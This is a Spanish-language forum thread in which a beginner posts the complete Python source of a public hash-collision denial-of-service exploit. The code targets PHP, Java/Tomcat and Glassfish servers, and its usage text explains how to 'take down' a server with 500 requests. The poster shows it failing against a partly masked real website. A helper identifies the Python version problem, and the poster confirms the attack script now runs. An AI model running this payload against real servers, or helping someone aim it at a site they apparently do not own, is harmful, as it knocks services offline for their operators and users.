no encuentro el erro ayuda!

Iniciado por ediporey2000, 27 Septiembre 2012, 09:02 AM

0 Miembros y 1 Visitante están viendo este tema.

ediporey2000

Hola este es el code de un exploit pero no encuentro el error es q en python y en general soy noob xD


#! /usr/bin/env python

"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_

Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC

Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision

http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858

requires Python 2.7

Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP

-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP

-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2

Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""

import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools

class Payloadgenerator:
   # Maximum recursions when searching for collisionchars
   _recursivemax = 15
   _recursivecounter = 1
   
   def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
       self._verbose = verbose
       self._collisionchars = collisionchars
       self._collisioncharlength = collisioncharlength
       self._payloadlength = payloadlength
   
   def generateASPPayload(self):
       raise Exception("ASP Payload not implemented")
   
   def generateJAVAPayload(self):
       a = self._computeJAVACollisionChars(self._collisionchars)
       return self._generatePayload(a, self._payloadlength)
   
   def generatePHPPayload(self):
       # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
       # compute entries with collisions in PHP hashtable hash function
       a = self._computePHPCollisionChars(self._collisionchars)
       return self._generatePayload(a, self._payloadlength);
   
   def _computePHPCollisionChars(self, count):
       charrange = range(0, 256)
       return self._computeCollisionChars(self._DJBX33A, count, charrange)
   
   def _computeJAVACollisionChars(self, count):
       charrange = range(0, 129)
       return self._computeCollisionChars(self._DJBX31A, count, charrange)
   
   def _computeCollisionChars(self, function, count, charrange):
       hashes = {}
       counter = 0
       length = self._collisioncharlength
       a = ""
       for i in charrange:
           a = a+chr(i)
       source = list(itertools.product(a, repeat=length))
       basestr = ''.join(random.choice(source))
       basehash = function(basestr)
       hashes[str(counter)] = basestr
       counter = counter + 1
       for item in source:
           tempstr = ''.join(item)
           if tempstr == basestr:
               continue
           if function(tempstr) == basehash:
               hashes[str(counter)] = tempstr
               counter = counter + 1
           if counter >= count:
               break;
       if counter < count:
           # Try it again
           if self._recursivecounter > self._recursivemax:
               print("Not enought values found. Please start this script again")
               sys.exit(1)
           print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
           self._recursivecounter = self._recursivecounter + 1
           hashes = self._computeCollisionChars(function, count, charrange)
       else:
           if self._verbose:
               print("Found values:")
               for item in hashes:
                   tempstr = hashes[item]
                   print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
                   for i in tempstr:
                       print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
       return hashes
   
   def _DJBXA(self, inputstring, base, start):
       counter = len(inputstring) - 1
       result = start
       for item in inputstring:
           result = result + (math.pow(base, counter) * ord(item))
           counter = counter - 1
       return int(round(result))
   
   #PHP
   def _DJBX33A(self, inputstring):
       return self._DJBXA(inputstring, 33, 5381)
   
   #Java
   def _DJBX31A(self, inputstring):
       return self._DJBXA(inputstring, 31, 0)
   
   #ASP
   def _DJBX33X(self, inputstring):
       counter = len(inputstring) - 1
       result = 5381
       for item in inputstring:
           result = result + (int(round(math.pow(33, counter))) ^ ord(item))
           counter = counter - 1
       return int(round(result))
   
   def _generatePayload(self, collisionchars, payloadlength):
       # Taken from:
       # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
   
       # how long should the payload be
       length = payloadlength
       size = len(collisionchars)
       post = ""
       maxvaluefloat = math.pow(size,length)
       maxvalueint = int(math.floor(maxvaluefloat))
       for i in range (maxvalueint):
           inputstring = self._base_convert(i, size)
           result = inputstring.rjust(length, "0")
           for item in collisionchars:
               result = result.replace(str(item), collisionchars[item])
           post += urllib.urlencode({result:""}) + "&"
   
       return post;
   
   def _base_convert(self, num, base):
       fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
       alphabet = fullalphabet[:base]
       if (num == 0):
           return alphabet[0]
       arr = []
       base = len(alphabet)
       while num:
           rem = num % base
           num = num // base
           arr.append(alphabet[rem])
       arr.reverse()
       return "".join(arr)

def main():
   parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
   parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
   parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
   parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
   parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
   parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
   parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
   parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
   parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
   parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
   parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
   parser.add_argument("--version", action="version", version="%(prog)s 6.0")

   options = parser.parse_args()
   
   if options.target == "PHP":
       if not options.maxpayloadsize or options.maxpayloadsize == 0:
           maxpayloadsize = 8
       else:
           maxpayloadsize = options.maxpayloadsize
   elif options.target == "ASP":
       if not options.maxpayloadsize or options.maxpayloadsize == 0:
           maxpayloadsize = 8
       else:
           maxpayloadsize = options.maxpayloadsize
   elif options.target == "JAVA":
       if not options.maxpayloadsize or options.maxpayloadsize == 0:
           maxpayloadsize = 2
       else:
           maxpayloadsize = options.maxpayloadsize
   else:
       print("Target %s not yet implemented" % options.target)
       sys.exit(1)

   url = urlparse.urlparse(options.url)

   if not url.scheme:
       print("Please provide a scheme to the URL(http://, https://,..")
       sys.exit(1)

   host = url.hostname
   path = url.path
   port = url.port
   if not port:
       if url.scheme == "https":
           port = 443
       elif url.scheme == "http":
           port = 80
       else:
           print("Unsupported Protocol %s" % url.scheme)
           sys.exit(1)
   if not path:
       path = "/"

   if not options.payload:
       print("Generating Payload...")
       
       # Number of colliding chars to find
       collisionchars = 5
       # Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
       collisioncharlength = 2
       # Length of each parameter in the payload
       payloadlength = 8
       generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
       if options.target == "PHP":
           payload = generator.generatePHPPayload()
       elif options.target == "ASP":
           #payload = generateASPPayload()
           print("Target %s not yet implemented" % options.target)
           sys.exit(1)
       elif options.target == "JAVA":
           payload = generator.generateJAVAPayload()
       else:
           print("Target %s not yet implemented" % options.target)
           sys.exit(1)

       print("Payload generated")
   else:
       f = open(options.payload, "r")
       payload = f.read()
       f.close()
       print("Loaded Payload from %s" % options.payload)

   # trim to maximum payload size (in MB)
   maxinmb = maxpayloadsize*1024*1024
   payload = payload[:maxinmb]
   # remove last invalid(cut off) parameter
   position = payload.rfind("=&")
   payload = payload[:position+1]
   
   # Save payload
   if options.save:
       f = open(options.save, "w")
       f.write(payload)
       f.close()
       print("Payload saved to %s" % options.save)

   # User selected to only generate the payload
   if options.generate:
       return

   print("Host: %s" % host)
   print("Port: %s" % str(port))
   print("path: %s" % path)
   print
   print

   for i in range(options.count):
       print("sending Request #%s..." % str(i+1))
       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       if url.scheme == "https":
           ssl_sock = ssl.wrap_socket(sock)
           ssl_sock.connect((host, port))
           ssl_sock.settimeout(None)
       else:
           sock.connect((host, port))
           sock.settimeout(None)

       request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)

       if url.scheme == "https":
           ssl_sock.send(request)
       else:
           sock.send(request)

       if options.verbose:
           if len(request) > 400:
               print(request[:400]+"....")
           else:
               print(request)
           print("")
       if options.wait or options.output:
           start = time.time()
           if url.scheme == "https"
               data = ssl_sock.recv(1024)
               string = ""
               while len(data):
                   string = string + data
                   data = ssl_sock.recv(1024)
           else:
               data = sock.recv(1024)
               string = ""
               while len(data):
                   string = string + data
                   data = sock.recv(1024)
           
           elapsed = (time.time() - start)
           print("Request %s finished" % str(i+1))
           print("Request %s duration: %s" % (str(i+1), elapsed))
           split = string.partition("\r\n\r\n")
           header = split[0]
           content = split[2]
           if options.verbose:
               # only print http header
               print("")
               print(header)
               print("")
           if options.output:
               f = open(options.output+str(i)+".html", "w")
               f.write("<!-- "+header+" -->\r\n"+content)
               f.close()

       if url.scheme == "https":
           ssl_sock.close()
           sock.close()
       else:
           sock.close()

if __name__ == "__main__":
   main()





este es el error q me teria cuando lo ejecuto

CitarC:\Users\c****\Desktop>exp.py -u http://www.me******.com -v -c 500 -t php
Traceback (most recent call last):
 File "C:\Users\c****\Desktop\exp.py", line 359, in <module>
   main()
 File "C:\Users\c****n\Desktop\exp.py", line 216, in main
   url = urlparse.urlparse(options.url)
NameError: global name 'urlparse' is not defined

les agradezco su colaboración

adastra

 Tiene pinta de que has instalado mal Python, porque urlparse es de la a`pi core y veo que la estas importando, que versión de python usas?
Lo otro es, para compilar y ejecutar el exploit, se necesita alguna dependencia? a lo mejor desde el sitio donde lo has descargado encuentras que librerias necesitas y puede ser que alguna no la tengas instalada, (openssl, por ejemplo).
Si no es un problema de la instalación de python es un problema de dependencias.

ediporey2000

se tenias toda la razón tenia la versión 3.2 e instale la versión 2.7 de phyton y ya funciono xD grax